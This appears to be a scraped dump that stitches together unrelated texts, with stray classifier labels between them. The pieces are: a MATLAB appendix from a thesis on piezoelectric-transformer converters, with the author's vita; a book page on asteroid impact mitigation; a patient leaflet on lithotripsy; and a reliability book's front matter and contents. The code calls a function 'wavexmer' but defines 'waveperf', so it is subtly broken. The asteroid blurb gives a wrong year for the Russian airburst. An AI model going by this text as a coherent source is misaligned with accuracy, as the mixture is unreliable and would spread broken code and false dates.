s12m(i)=20*log10(abs(s12)); s11m(i)=20*log10(abs(s11)); s22m(i)=20*log10(abs(s22)); deltas=s11*s22-s12*s21; k=0.02/(1+s22+s11+deltas); y11=k*(1+s22-s11-deltas); y12=-2*k*s12; y21=-2*k*s21; y22=k*(1+s11-s22-deltas); yinld=y11-y12*y21/(yload+y22); pinld=real(yinld); 184 vld=-y21/(yload+y22); poutld=abs(vld)*abs(vld)*real(yload); rinldm(i)=1/real(yinld); cinldm(i)=imag(yinld)/w; yinlm(i)=abs(yinld); ayinlm(i)=ANGLE(yinld)/3.14165*360; pinldm(i)=pinld; poutldm(i)=poutld; effldm(i)=poutld/pinld; vgainldm(i)=abs(vld); y11m(i)=abs(y11); gfm(i)=real(y11); bfm(i)=imag(y11); angle=atan2(bfm(i),gfm(i)); anglem(i)=angle/2/pi*360; y22f(i)=abs(y22); gbm(i)=real(y22); bbm(i)=imag(y22); c=abs(y12*y21)/abs(2*real(y11)*real(y22)-real(y12*y21)); x=-1/c+sqrt(1-c^2)/c; lm(i)=1-x*real(y12*y21)/abs(y12*y21); mm(i)=imag(y12*y21)*x/abs(y12*y21); ccm(i)=c; kk=-y21/2/real(y22); phi2=(lm(i)+ii*mm(i))*kk; sin=y11+phi2*y12; yinm(i)=sin; rinm(i)=1/real(sin); cinm(i)=imag(sin)/2/pi/f(i); pinm(i)=real(sin); qinm(i)=imag(sin); gammal=2*real(y22)/(lm(i)+ii*mm(i))-y22; yoptm(i)=abs(gammal); ayoptm(i)=ANGLE(gammal)/2/pi*360; zlm(i)=real(1/gammal); llm(i)=imag(1/(gammal)/2/pi/f(i)); zlpm(i)=1/real(gammal); llpm(i)=-1/imag(gammal)/2/pi/f(i); 185 sout=abs(phi2)^2*gammal; effm(i)=real(sout)/real(sin); poutm(i)=real(sout); qoutm(i)=imag(sout); vgainm(i)=abs(y21/(gammal+y22)); y11f(i)=abs(y11); gfm(i)=real(y11); bfm(i)=imag(y11); y22f(i)=abs(y22); gbm(i)=real(y22); bbm(i)=imag(y22); end figure(1) subplot(2,2,1), plot(f,s21k,f,s21m,f,s12m) subplot(2,2,2), plot(f,s11k,f,s11m) subplot(2,2,3), plot(gfk,bfk,gfm,bfm) subplot(2,2,4), plot(f,s22k,f,s22m) pause figure(2) subplot(4,2,1), plot(f,zl,f,zlm) subplot(4,2,2), plot(f,ll,f,llm) subplot(4,2,3), plot(f,yoptk,f,yoptm) subplot(4,2,4), plot(f,ayoptk,f,ayoptm) subplot(4,2,5), plot(f,vgain,f,vgainm) subplot(4,2,6), plot(f,cin,f,cinm) subplot(4,2,7), plot(f,eff,f,effm) subplot(4,2,8), plot(f,pin,f,pinm) pause figure(3) subplot(2,2,1), plot(f,pinldk,f,pinldm) subplot(2,2,2), plot(f,poutldk,f,poutldm) subplot(2,2,3), plot(f,effldk,f,effldm) subplot(2,2,4), plot(f,vgainldk, f,vgainldm) pause 186 APPENDIX F : MATLAB Program to Calculate the DC Characteristics of SE-QR Amplifiers % APPENDIX F.1 % Flyback single-ended quasi-resonant converters. % Calculation of normalized gain, voltage stress, and current stress of HVPT-2. % ZVS operation when Vs1=0 and Ilr<0. clear % input section cwind=1e-9; % winding capacitance eps=1e-3; ii=sqrt(-1); effconv=0.95; nr=6.9; RLD=[50e3 100e3 200e3 300e3 400e3 500e3]; % load resistance of the PT Lrr=50e-6; % input value for resonant inductor % lump model of HVPT-2 cd1=810.75e-12; fs21=67054.25; C=37.748e-12; L=1/C/(2*pi*fs21)^2; % L=0.1492; R=68.45; cd2=8.8e-12; % cd2=7.33e-12; nc=1/5.16; % step-up ratio of HVPT-2 rcd1=615e3; rcd2=66e6; 187 % beginning of the program for ik = 1:21 fs(ik)=65000+(ik-1)*500; % step of switching frequency Fs ws=2*pi*fs(ik); fn1=ws*sqrt(Lrr*(cd1*(nr)^2+cwind)); % calculation of the fundamental voltage when qp is very large [vcrms,vc1st,ilmax,vcmax,vcn,iln,nt] = wavexmer(1e-6,fn1); for j = 1:(nt+1); wstn(j)=1/fs(ik)/nt*j; end vcrmsn=vcrms; % normalized RMS voltage across S1 vc1stn=vc1st; % normalized fundamental voltage across S1 % y11, y12, y21, y22 zs2=R+ii*ws*L+1/ws/C/ii; zs=1/((1/zs2)); z11=1/(1/rcd1+ii*ws*cd1); z22=1/(1/rcd2+ii*ws*cd2); y11c=1/z11+1/zs; y12c=-nc/zs; y21c=y12c; y22c=1/z22+nc*nc/zs; for i=1:6 flg=0; jb=0; Rload=RLD(i); % load of the PT yload=1/Rload; % Load admittance zload=1/yload; yinldc=y11c-y12c*y21c/(yload+y22c)-1/z11; cinldk(i)=imag(yinldc)/ws; % calculation of the equivalent Racp vldc=-y21c/(yload+y22c); vgainldk(i)=abs(vldc); vgainco(i)=vc1stn*vgainldk(i)*nr/sqrt(2); poutld(i)=vgainco(i)^2/abs(zload); racp(i)=(vcrmsn)^2/poutld(i)*effconv; racpk(i,ik)=racp(i); 188 ri=racp(i); ci(i)=cd1*nr^2+cwind; w=sqrt(1/Lrr/ci(i)-1/4/ri^2/ci(i)^2); fn2=ws/w; fn(i)=fn2; adw=1/2/ri/ci(i)/w; wodw=sqrt(1+(adw)^2); qp(i)=0.5*wodw/adw; % calculation of the voltage and current waveforms [vcrms,vc1st,ilmax,vcmax,vcn,iln,nt] = wavexmer(adw,fn2); vcnrms(i,ik)=vcrms; ilnmax(i,ik)=ilmax; vcnmax(i,ik)=vcmax; vgaincon(i,ik)=vgainco(i); figure(1) subplot(2,1,1); plot(wstn,vcn); hold on; grid on; ylabel('vcn'); subplot(2,1,2); plot(wstn,iln); hold on; grid on; ylabel('iln'); end end figure(2); subplot(2,1,1); mesh(fs,RLD,vcnrms); grid on; title ('Lrr = 50 uH'); xlabel ('Freqency'); ylabel (' Rload '); zlabel ('vcn_rms'); view(45,45); subplot(2,1,2); mesh(fs,RLD,vgaincon); grid on; title ('Lrr = 50 uH'); xlabel ('Freqency'); ylabel (' Rload '); zlabel ('vgaincon'); 189 % APPENDIX F.2 % Function for calculating steady-state voltage and current of the flyback % single-ended quasi-resonant converter % Reference to Fig. 4.15 (c) % Normalized input variables: adw and fn % fn: ratio between switching frequency fs and resonant frequency % adw: ratio between 1/(2 racp cin) and resonant frequency, a = 1/(2 racp cin) % Normalized output variables: vcrms,vc1st,ilmax,vcmax,vcn,iln,nt % vcrms: RMS voltage across S1 % vc1st: fundamental voltage of S1 % ilmax: peak to peak resonant inductor current % vcmax: maximum voltage across S1 % vcn: voltage waveform across S1 % iln: current waveform of the resonant inductor Lr % nt: number of iteration function [vcrms,vc1st,ilmax,vcmax,vcn,iln,nt] = waveperf(adw,fn); % input section niter=200; eps=1e-3; ii=sqrt(-1); wodw=sqrt(1+(adw)^2); % ratio between wo and w for an input adw qp=0.5*wodw/adw; % qp= rin/zo = 0.5 wo/a = 0.5 wodw/adw flg=0; jb=0; % calculation of the steady-state variables for j=1:niter wtoff=pi*(1.005+0.9*j/niter); wtoffn(j)=wtoff/2/pi*360; % calculation of fn under the ZVS condition eat=exp(-adw*wtoff); % exponential term caused by the load resistance % derivation of Io when voltage across S1 is equal to zero for a arbitrary wtoff 190 ion(j)=-(1-cos(wtoff)*eat+adw*sin(wtoff)*eat)/wodw/sin(wtoff)/eat; Io=ion(j); % initial current when S1 is turned off il1=eat*(wodw*sin(wtoff)+ion(j)*(cos(wtoff)+adw*sin(wtoff))); il2=0; iln(j)=il1+il2; Il=iln(j); % inductor current when Vs1 = 0 DELTA(j)=abs(Io-Il); fsk(j)=2*pi/(DELTA(j)+wodw*wtoff); deltaf=fn-fsk(j); wtoffk(j)=wtoff; if (deltaf <=eps),jb=j,break, end % the approximated solution for wtoff if (j == niter), jb=j, break, end end fs=fsk(jb); % record of fs, stoptime, and starttime stoptime=wtoffk(jb); startime=wtoffk(jb-1); % narrow down the region of the solution for j=1:(niter/2+1) if (jb == niter), break, end wtoff=startime+(stoptime-startime)*(j-1)/(niter/2); wtoffn(j)=wtoff/2/pi*360; % calculation of fn under the ZVS condition eat=exp(-adw*wtoff); ion(j)=-(1-cos(wtoff)*eat+adw*sin(wtoff)*eat)/wodw/sin(wtoff)/eat; Io=ion(j); il1=eat*(wodw*sin(wtoff)+ion(j)*(cos(wtoff)+adw*sin(wtoff))); % il2=1/qp*(1-cos(wtoff)*eat-adw*sin(wtoff)*eat); il2=0; iln(j)=il1+il2; Il=iln(j); DELTA(j)=abs(Io-Il); % fsk(j)=2*pi/(DELTA(j)/wodw+wtoff); fsk(j)=2*pi/(DELTA(j)+wodw*wtoff); deltaf=fn-fsk(j); 191 if (deltaf <=eps),jb=j,break,end end % waveforms for vcn and iln. nt=400; deltat=2*pi/nt/fn; for j=1:(nt+1) wotn(j)=j; if (jb == niter), vcn(j)=0; iln(j)=0; Io=0; Il=0; else wst(j)=(j-1)*2*pi/nt; wt=wst(j)/fn; if flg==0, eat=exp(-adw*wt); vcn(j)=(1-cos(wt)*eat+adw*sin(wt)*eat)+Io*wodw*sin(wt)*eat; il1=eat*(wodw*sin(wt)+Io*(cos(wt)+adw*sin(wt))); il2=0; iln(j)=il1+il2; if ((vcn(j)+eps) < 0),flg=1; end; else vcn(j)=0; iln(j)=iln(j-1)+deltat; end end vcrm(j)=(vcn(j)-1)^2; % RMS value of Vs1 end vcrms=sqrt(sum(vcrm)/(nt+1)); if (vcrms == 1); vcrms=0; end ilmax=Io-Il; vcmax=max(vcn); [Freq, Spec]=spec_st(nt,vcn,wotn,9); % calculate the harmonics of Vs1 or vcn vc1st=abs(Spec(2))*2; return 192 VITA The author, Chih-yi Lin, was born in Taiwan, Republic of China, on January 25, 1961. He received his B.S. degree in Electrical Engineering in 1982 from Tatung Institute of Technology, Taipei. He received M.S. degree from National Tsing-Hua University in 1984 in Electrical Engineering. After serving in Chinese Army, he joined Chung-San Institute of Science and Technology as a assistant researcher from 1984 to 1990. In 1991, he enrolled in the Electrical Engineering Department, Virginia Polytechnic Institute & State University, as a graduate student and become a member of the Virginia Power Electronics Center to work toward his Ph.D. degree ever since. His main research interests include modeling, analysis, and design of low-power to high- power as well as low-voltage to high-voltage dc/dc converters.
__label__pos
0.740589
Advertisement Incoming Asteroid! What Could We Do About It? • Duncan Lunan Book • 7.6k Downloads Part of the Astronomers' Universe book series (ASTRONOM) Table of contents 1. Front Matter Pages i-xvii 2. Is There a Danger? 1. Front Matter Pages 1-1 2. Duncan Lunan Pages 3-44 3. Duncan Lunan Pages 45-81 3. Incoming! 1. Front Matter Pages 83-83 2. Duncan Lunan Pages 85-107 3. Duncan Lunan Pages 109-176 4. What Would We Do? 1. Front Matter Pages 177-177 2. Duncan Lunan Pages 179-212 3. Duncan Lunan Pages 213-258 4. Duncan Lunan Pages 259-276 5. The Aftermath and the Present 1. Front Matter Pages 277-277 2. Duncan Lunan Pages 279-319 3. Duncan Lunan Pages 321-332 6. Back Matter Pages 333-390 About this book Introduction Lately there have been more and more news stories on objects from space – such as asteroids, comets, and meteors – whizzing past Earth. One even exploded in the atmosphere over a Russian city in 2012, causing real damage and injuries. Impacts are not uncommon in our Solar System, even on Earth, and people are beginning to realize that we must prepare for such an event here on Earth.   What if we knew there was going to be an impact in 10 years’ time? What could we do? It’s not so far in the future that we can ignore the threat, and not so soon that nothing could be done. The author and his colleagues set out to explore how they could turn aside a rock asteroid, one kilometer in diameter, within this 10-year timescale.   Having set themselves this challenge, they identified the steps that might be taken, using technologies that are currently under development or proposed. They considered an unmanned mission, a follow-up manned mission, and a range of final options, along with ways to reduce the worst consequences for humanity if the impact cannot be prevented.   With more warning, the techniques described could be adapted to deal with more severe threats. If successful, they can generate the capability for a much expanded human presence in space thereafter. With the dangers now beginning to be recognized internationally and with major new programs already in motion, the prospects for civilization and humanity, in relation to the danger of impacts, look much more hopeful than they did only a decade ago. Keywords ASTRA project Asteroid dangers description Asteroid impact risk Asteroid watch Astronomical impact hazard Earth threat statistics Earth-grazing asteroids Impact threat mitigation Mass extinction prevention Near-earth objects Authors and affiliations • Duncan Lunan • 1 1. 1.TroonUnited Kingdom Bibliographic information
__label__pos
0.997794
Lithotripsy What is lithotripsy? Lithotripsy is a procedure used to treat kidney stones that are too large to pass through the urinary tract. It works by sending focused ultrasound energy as shock waves directly to the stone. The shock waves break a large stone into smaller stones that will pass through the urinary system. Lithotripsy lets people with certain types of kidney stones possibly not need surgery. To find the stone, healthcare providers use fluoroscopy. This is a series of moving X-ray pictures. They may also use ultrasound to find the stone. There are two types of shock wave technology. In the original method, the person is placed in a tub of water through which the shock waves are sent guided by X-rays or ultrasound. This method is still in use. In a second method, the person lies on a soft cushion and the shock waves pass through that. This method is more common. Why might I need lithotripsy? When substances normally excreted through the kidneys stay in a kidney, they may crystallize and harden into a kidney stone. If the stones break free, they can get stuck in the narrower passages of the urinary tract. Some kidney stones are small or smooth enough to pass easily through the urinary tract without discomfort. Other stones may have rough edges or grow as large as a pea or more. These can cause great pain as they move through or block the urinary tract. The areas that are more prone to trapping kidney stones are the bladder, ureters, and urethra. Most kidney stones are small enough to pass without treatment. But about 1 in 5 cases, the stone is greater than 2 cm (about 1 inch) and may need treatment. Most kidney stones are made of calcium. But there are other types of kidney stones. Types of kidney stones include: • Calcium stones. Calcium is a normal part of a healthy diet and used in bones and muscles. It's normally flushed out with the urine. Excess calcium not used by the body may mix with other waste products to form a stone. • Struvite stones. Struvite stones are made of magnesium, phosphate, and ammonia. They may form after a urinary tract infection. • Uric acid stones. Uric acid stones may form when urine is too acidic. This can happen when you have gout or certain cancers. • Cystine stones. These stones are made of cystine. This is one of the building blocks that make up muscles, nerves, and other parts of the body. When kidney stones get too large to pass through the urinary tract, they may cause severe pain and may block the flow of urine. This can cause infection and problems with how the kidneys work. There may be other reasons for your healthcare provider to advise lithotripsy. What are the risks of lithotripsy? Risks of lithotripsy may include: • Bleeding around the kidney. It's common for there to be small amounts of blood in the urine for a few days after the procedure. • Infection • Blockage of the urinary tract by pieces of stone. This can lead to kidney failure in extreme cases. • Pieces of stone that aren't passed from the body may need more lithotripsy treatments. Obesity and intestinal gas may interfere with a lithotripsy treatment. • Excessive pain or discomfort Not everyone is able to have lithotripsy, including: • Women who are pregnant. This treatment is unsafe for a fetus. • People who have a large aortic aneurysm • People with certain bleeding conditions • Those with certain skeletal deformities that prevent accurate focus of shock waves Tell your healthcare provider if you have a heart pacemaker. Lithotripsy may be done on people with pacemakers with the approval of a cardiologist and by using certain precautions. Be sure to discuss any concerns with your provider before the procedure. You may want to ask your provider about the amount of radiation used during lithotripsy. It is a good idea to keep a record of your radiation exposure, such as previous scans and other types of X-rays, so that you can tell your provider. Radiation risks may be related to the cumulative exposure over time. How do I get ready for lithotripsy? • Your healthcare provider will explain the procedure, and you can ask questions. • You'll be asked to sign a consent form that gives your permission to do the procedure. Read the form carefully and ask questions if something isn't clear. • Your provider will ask about your health history. They will also do a physical exam to make sure you're in good health before having the procedure. You may have blood or other tests. • You may need to fast before the procedure. You'll be given instructions on how many hours to fast before the procedure if needed. • Tell your provider if you're pregnant or think you may be. Pregnant women shouldn't have lithotripsy because of the risks to the fetus. • Tell your provider if you're sensitive to or allergic to any medicines, latex, tape, or anesthesia. • Tell your provider of all medicines (prescription and over-the-counter) and herbal supplements that you're taking. • Tell your provider if you have a history of bleeding disorders or if you're taking any anticoagulant (blood-thinning) medicines, aspirin, or other medicines that affect blood clotting. You may need to stop these medicines before the procedure. • You may get a sedative or anesthetic before the procedure to help you relax. • Based on your medical condition, your provider may ask for other specific preparations. What happens during lithotripsy? Lithotripsy may be done on an outpatient basis or as part of a hospital stay. Procedures may vary depending on your condition and your healthcare provider’s practices. Generally, lithotripsy follows this process: 1. You'll need to remove any clothing, jewelry, or other objects that may interfere with the procedure. 2. If you need to remove your clothing, you'll put on a hospital gown. 3. An IV (intravenous) line will be inserted in your arm or hand to give you fluids and medicines. 4. You may get medicine to help you relax or medicine to stop pain to make sure that you stay comfortable, still, and pain-free during the procedure. 5. After the sedation has taken effect, you'll be put on a water-filled cushion or immersed in a water-filled tub. 6. After the stone(s) has been found with fluoroscopy or ultrasound, you'll be positioned for the best access to the stone. 7. If you're awake during the procedure, you may feel a light tapping feeling on your skin. 8. A series of shock waves will be sent to shatter the kidney stone(s). 9. The stone(s) will be kept track of by fluoroscopy or ultrasound during the procedure. 10. The medical staff may place a stent, in the ureter before lithotripsy to help keep the passage open so stone pieces and urine can pass easily. 11. Once the stone fragments are small enough to pass through the urinary system, the procedure will end. Talk with your healthcare provider about what you'll experience during your lithotripsy procedure. What happens after lithotripsy? After lithotripsy, you'll be taken to the postanesthesia recovery room for observation. Once your blood pressure, pulse, and breathing are stable and you're alert, you will be taken to your hospital room or discharged home. Plan to have someone give you a ride home. You shouldn't drive for at least 24 hours after getting sedatives for the procedure. You may go back to your usual diet and activities unless your healthcare provider tells you otherwise. Certain stones can be prevented by dietary and lifestyle changes. You will be encouraged to drink extra fluids to dilute the urine and reduce the discomfort of passing stone pieces. You may notice blood in your urine for a few days or longer after the procedure. This is normal. You may notice bruising on the back or belly. This is also normal. Take a pain reliever for soreness only as recommended by your provider. Don't take aspirin, ibuprofen, or certain other pain medicines. They may increase the chance of bleeding. You may be given antibiotics after the procedure. Be sure to take the medicine exactly as prescribed. You may be asked to strain your urine so that remaining stones or stone pieces can be sent to the lab for testing. A follow-up appointment will be scheduled within a few weeks after the procedure. If a stent was placed, it may be removed at this time. Call your healthcare provider right away if you have any of the following: • Fever, chills • Burning with urination • Urinary frequency or urgency • Extreme lower back pain Your healthcare team may give you other instructions after the procedure, depending on your particular situation. Next steps Before you agree to the test or the procedure make sure you know: • The name of the test or procedure • The reason you are having the test or procedure • What results to expect and what they mean • The risks and benefits of the test or procedure • What the possible side effects or complications are • When and where you are to have the test or procedure • Who will do the test or procedure and what that person’s qualifications are • What would happen if you did not have the test or procedure • Any alternative tests or procedures to think about • When and how you will get the results • Who to call after the test or procedure if you have questions or problems • How much you will have to pay for the test or procedure Online Medical Reviewer: Chris Southard RN Online Medical Reviewer: Raymond Kent Turley BSN MSN RN Online Medical Reviewer: Walead Latif MD Date Last Reviewed: 8/1/2023 © 2000-2023 The StayWell Company, LLC. All rights reserved. This information is not intended as a substitute for professional medical care. Always follow your healthcare professional's instructions.
__label__pos
0.65959
Failure Rate Modelling for Reliability and Risk (Springer Series in Reliability Engineering) • 20 11 9 • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up Failure Rate Modelling for Reliability and Risk (Springer Series in Reliability Engineering) Springer Series in Reliability Engineering Series Editor Professor Hoang Pham Department of Industrial and Systems Eng 672 37 2MB Pages 296 Page size 439.37 x 666.14 pts Year 2008 Report DMCA / Copyright DOWNLOAD FILE Recommend Papers File loading please wait... Citation preview Springer Series in Reliability Engineering Series Editor Professor Hoang Pham Department of Industrial and Systems Engineering Rutgers, The State University of New Jersey 96 Frelinghuysen Road Piscataway, NJ 08854-8018 USA Other titles in this series The Universal Generating Function in Reliability Analysis and Optimization Gregory Levitin Warranty Management and Product Manufacture D.N.P. Murthy and Wallace R. Blischke Maintenance Theory of Reliability Toshio Nakagawa System Software Reliability Hoang Pham Reliability and Optimal Maintenance Hongzhou Wang and Hoang Pham Applied Reliability and Quality B.S. Dhillon Shock and Damage Models in Reliability Theory Toshio Nakagawa Risk Management Terje Aven and Jan Erik Vinnem Satisfying Safety Goals by Probabilistic Risk Assessment Hiromitsu Kumamoto Offshore Risk Assessment (2nd Edition) Jan Erik Vinnem The Maintenance Management Framework Adolfo Crespo Márquez Human Reliability and Error in Transportation Systems B.S. Dhillon Complex System Maintenance Handbook D.N.P. Murthy and Khairy A.H. Kobbacy Recent Advances in Reliability and Quality in Design Hoang Pham Product Reliability D.N.P. Murthy, Marvin Rausand and Trond Østerås Mining Equipment Reliability, Maintainability, and Safety B.S. Dhillon Advanced Reliability Models and Maintenance Policies Toshio Nakagawa Justifying the Dependability of Computerbased Systems Pierre-Jacques Courtois Reliability and Risk Issues in Large Scale Safety-critical Digital Control Systems Poong Hyun Seong Maxim Finkelstein Failure Rate Modelling for Reliability and Risk 123 Maxim Finkelstein, PhD, DSc Department of Mathematical Statistics University of the Free State Bloemfontein South Africa and Max Planck Institute for Demographic Research Rostock Germany ISBN 978-1-84800-985-1 e-ISBN 978-1-84800-986-8 DOI 10.1007978-1-84800-986-8 Springer Series in Reliability Engineering ISSN 1614-7839 A catalogue record for this book is available from the British Library Library of Congress Control Number: 2008939573 © 2008 Springer-Verlag London Limited Apart from any fair dealing for the purposes of research or private study, or criticism or review, as permitted under the Copyright, Designs and Patents Act 1988, this publication may only be reproduced, stored or transmitted, in any form or by any means, with the prior permission in writing of the publishers, or in the case of reprographic reproduction in accordance with the terms of licences issued by the Copyright Licensing Agency. Enquiries concerning reproduction outside those terms should be sent to the publishers. The use of registered names, trademarks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant laws and regulations and therefore free for general use. The publisher makes no representation, express or implied, with regard to the accuracy of the information contained in this book and cannot accept any legal responsibility or liability for any errors or omissions that may be made. Cover design: deblik, Berlin, Germany Printed on acid-free paper 9 8 7 6 5 4 3 2 1 springer.com To my wife Olga Preface In the early 1970s, after obtaining a degree in mathematical physics, I started working as a researcher in the Department of Reliability of the Saint Petersburg Elektropribor Institute. Founded in 1958, it was the first reliability department in the former Soviet Union. At first, for various reasons, I did not feel a strong inclination towards the topic. Everything changed when two books were placed on my desk: Barlow and Proshcan (1965) and Gnedenko et al. (1964). On the one hand, they showed how mathematical methods could be applied to various reliability engineering problems; on the other hand, these books described reliability theory as an interesting field in applied mathematics/probability and statistics. And this was the turning point for me. I found myself interested–and still am after more than 30 years of working in this field. This book is about reliability and reliability-related stochastics. It focuses on failure rate modelling in reliability analysis and other disciplines with similar settings. Various applications of risk analysis in engineering and biological systems are considered in the last three chapters. Although the emphasis is on the failure rate, one cannot describe this topic without considering other reliability measures. The mean remaining lifetime is the first in this list, and we pay considerable attention to describing and discussing its properties. The presentation combines classical results and recent results of other authors with our research over the last 10 to15 years. The recent excellent encyclopaedic books by Lai and Xie (2006) and Marshall and Olkin (2007) give a broad picture of the modern mathematical reliability theory and also present an up-to-date source of references. Along with the classical text by Barlow and Proschan (1975), the excellent textbook by Rausand and Hoyland (2004) and a mathematically oriented reliability monograph by Aven and Jensen (1999), these books can be considered as complementary or further reading. I hope that our text will be useful for reliability researchers and practitioners and to graduate students in reliability or applied probability. I acknowledge the support of the University of the Free State, the National Research Foundation (South Africa) and the Max Planck Institute for Demographic Research (Germany). I thank those with whom I had the pleasure of working and (or) discussing reliability-related problems: Frank Beichelt, Ji Cha, Pieter van Gelder, Waltraud viii Preface Kahle, Michail Nikulin, Jan van Noortwijk, Michail Revjakov, Michail Rosenhaus, Fabio Spizzichino, Jef Teugels, Igor Ushakov, James Vaupel, Daan de Waal, Tertius de Wet, Anatoly Yashin, Vladimir Zarudnij. Chapters 6 and 7 are written in co-authorship with my daughter Veronica Esaulova on the basis of her PhD thesis (Esaulova, 2006). Many thanks to her for this valuable contribution. I would like to express my gratitude and appreciation to my colleagues in the department of mathematical statistics of the University of the Free State. Annual visits (since 2003) to the Max Planck Institute for Demographic Research (Germany) also contributed significantly to this project, especially to Chapter 10, which is devoted to demographic and biological applications. Special thanks to Justin Harvey and Lieketseng Masenyetse for numerous suggestions for improving the presentation of this book. Finally, I am indebted to Simon Rees, Anthony Doyle and the Springer staff for their editorial work. University of the Free State South Africa July 2008 Maxim Finkelstein Contents 1 Introduction....................................................................................................... 1 1.1 Aim and Scope of the Book ....................................................................... 1 1.2 Brief Overview.. ........................................................................................ 5 2 Failure Rate and Mean Remaining Lifetime .................................................. 9 2.1 Failure Rate Basics .................................................................................. 10 2.2 Mean Remaining Lifetime Basics............................................................ 13 2.3 Lifetime Distributions and Their Failure Rates ....................................... 19 2.3.1 Exponential Distribution............................................................... 19 2.3.2 Gamma Distribution ..................................................................... 20 2.3.3 Exponential Distribution with a Resilience Parameter ................. 22 2.3.4 Weibull Distribution ..................................................................... 23 2.3.5 Pareto Distribution........................................................................ 24 2.3.6 Lognormal Distribution ................................................................ 25 2.3.7 Truncated Normal Distribution..................................................... 26 2.3.8 Inverse Gaussian Distribution ...................................................... 27 2.3.9 Gompertz and Makeham–Gompertz Distributions....................... 27 2.4 Shape of the Failure Rate and the MRL Function.................................... 28 2.4.1 Some Definitions and Notation .................................................... 28 2.4.2 Glaser’s Approach ........................................................................ 30 2.4.3 Limiting Behaviour of the Failure Rate and the MRL Function... 36 2.5 Reversed Failure Rate.............................................................................. 39 2.5.1 Definitions .................................................................................... 39 2.5.2 Waiting Time................................................................................ 42 2.6 Chapter Summary .................................................................................... 43 3 More on Exponential Representation ........................................................... 45 3.1 Exponential Representation in Random Environment ............................. 45 3.1.1 Conditional Exponential Representation ...................................... 45 3.1.2 Unconditional Exponential Representation .................................. 47 3.1.3 Examples ...................................................................................... 48 3.2 Bivariate Failure Rates and Exponential Representation......................... 52 x Contents 3.3 3.4 3.2.1 Bivariate Failure Rates ................................................................. 52 3.2.2 Exponential Representation of Bivariate Distributions ................ 54 Competing Risks and Bivariate Ageing................................................... 59 3.3.1 Exponential Representation for Competing Risks........................ 59 3.3.2 Ageing in Competing Risks Setting ............................................. 60 Chapter Summary .................................................................................... 65 4 Point Processes and Minimal Repair ............................................................ 67 4.1 Introduction – Imperfect Repair............................................................... 67 4.2 Characterization of Point Processes......................................................... 70 4.3 Point Processes for Repairable Systems .................................................. 72 4.3.1 Poisson Process ............................................................................ 72 4.3.2 Renewal Process........................................................................... 73 4.3.3 Geometric Process ........................................................................ 76 4.3.4 Modulated Renewal-type Processes ............................................. 79 4.4 Minimal Repair. ....................................................................................... 81 4.4.1 Definition and Interpretation ........................................................ 81 4.4.2 Information-based Minimal Repair .............................................. 83 4.5 Brown–Proschan Model .......................................................................... 84 4.6 Performance Quality of Repairable Systems ........................................... 85 4.6.1 Perfect Restoration of Quality ...................................................... 86 4.6.2 Imperfect Restoration of Quality .................................................. 88 4.7 Minimal Repair in Heterogeneous Populations ....................................... 89 4.8 Chapter Summary .................................................................................... 92 5 Virtual Age and Imperfect Repair ................................................................ 93 5.1 Introduction – Virtual Age....................................................................... 93 5.2 Virtual Age for Non-repairable Objects................................................... 95 5.2.1 Statistical Virtual Age .................................................................. 95 5.2.2 Recalculated Virtual Age.............................................................. 98 5.2.3 Information-based Virtual Age................................................... 102 5.2.4 Virtual Age in a Series System................................................... 105 5.3 Age Reduction Models for Repairable Systems .................................... 107 5.3.1 G-renewal Process ...................................................................... 107 5.3.2 ‘Sliding’ Along the Failure Rate Curve...................................... 109 5.4 Ageing and Monotonicity Properties ..................................................... 115 5.5 Renewal Equations ................................................................................ 123 5.6 Failure Rate Reduction Models ............................................................. 125 5.7 Imperfect Repair via Direct Degradation .............................................. 127 5.8 Chapter Summary .................................................................................. 130 6 Mixture Failure Rate Modelling.................................................................. 133 6.1 Introduction – Random Failure Rate...................................................... 133 6.2 Failure Rate of Discrete Mixtures.......................................................... 138 6.3 Conditional Characteristics and Simplest Models ................................. 139 6.3.1 Additive Model........................................................................... 141 6.3.2 Multiplicative Model .................................................................. 143 Contents 6.4 6.5 6.6 6.7 6.8 xi Laplace Transform and Inverse Problem ............................................... 144 Mixture Failure Rate Ordering............................................................... 149 6.5.1 Comparison with Unconditional Characteristic.......................... 149 6.5.2 Likelihood Ordering of Mixing Distributions ............................ 152 6.5.3 Mixing Distributions with Different Variances .......................... 157 Bounds for the Mixture Failure Rate ..................................................... 159 Further Examples and Applications....................................................... 163 6.7.1 Shocks in Heterogeneous Populations........................................ 163 6.7.2 Random Scales and Random Usage ........................................... 164 6.7.3 Random Change Point ................................................................ 165 6.7.4 MRL of Mixtures........................................................................ 167 Chapter Summary .................................................................................. 168 7 Limiting Behaviour of Mixture Failure Rates............................................ 171 7.1 Introduction............................................................................................ 171 7.2 Discrete Mixtures................................................................................... 172 7.3 Survival Models..................................................................................... 175 7.4 Main Asymptotic Results....................................................................... 177 7.5 Specific Models ..................................................................................... 179 7.5.1 Multiplicative Model .................................................................. 179 7.5.2 Accelerated Life Model .............................................................. 182 7.5.3 Proportional Hazards and Other Possible Models ...................... 183 7.6 Asymptotic Mixture Failure Rates for Multivariate Frailty ................... 184 7.6.1 Introduction ................................................................................ 184 7.6.2 Competing Risks for Mixtures ................................................... 185 7.6.3 Limiting Behaviour for Competing Risks .................................. 187 7.6.4 Bivariate Frailty Model .............................................................. 189 7.7 Sketches of the Proofs............................................................................ 192 7.8 Chapter Summary .................................................................................. 196 8 ‘Constructing’ the Failure Rate................................................................... 197 8.1 Terminating Poisson and Renewal Processes ........................................ 197 8.2 Weaker Criteria of Failure ..................................................................... 201 8.2.1 Fatal and Non-fatal Shocks......................................................... 201 8.2.2 Fatal and Non-fatal Failures ....................................................... 205 8.3 Failure Rate for Spatial Survival............................................................ 207 8.3.1 Obstacles with Fixed Coordinates .............................................. 207 8.3.2 Crossing the Line Process........................................................... 210 8.4 Multiple Availability on Demand .......................................................... 213 8.4.1 Introduction ................................................................................ 213 8.4.2 Simple Criterion of Failure......................................................... 215 8.4.3 Two Consecutive Non-serviced Demands.................................. 218 8.4.4 Other Weaker Criteria of Failure................................................ 221 8.5 Acceptable Risk and Thinning of the Poisson Process .......................... 222 8.6 Chapter Summary .................................................................................. 223 xii Contents 9 Failure Rate of Software .............................................................................. 225 9.1 Introduction............................................................................................ 225 9.2 Several Empirical Models for Software Reliability ............................... 226 9.2.1 The Jelinski–Moranda Model ..................................................... 227 9.2.2 The Moranda Model ................................................................... 228 9.2.3 The Schick and Wolverton Model.............................................. 229 9.2.4 Models Based on the Number of Failures .................................. 230 9.3 Time-dependant Operational Profile...................................................... 231 9.3.1 General Setting ........................................................................... 231 9.3.2 